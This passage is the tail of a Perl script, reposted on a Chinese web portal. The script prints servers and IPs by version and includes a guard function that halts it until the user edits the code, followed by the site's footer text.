$affected)  if ($curver ne $version);  $curver = $version;  print " " . $server . "($ip)\n"; } exit(0); sub IKnowWhatImDoing {  local $IKnowWhatImDoing = 0;  # Uncomment the following line to make this script work.  # $IKnowWhatImDoing++;  die "I told you to read the code first, didn't I?\n"  unless $IKnowWhatImDoing;  return; } =-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
󰈣󰈤
王朝萬家燈火計劃
期待原創作者加盟
 
 
 
>>返回首頁<<
 
 
 
 
 熱帖排行
 
 
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有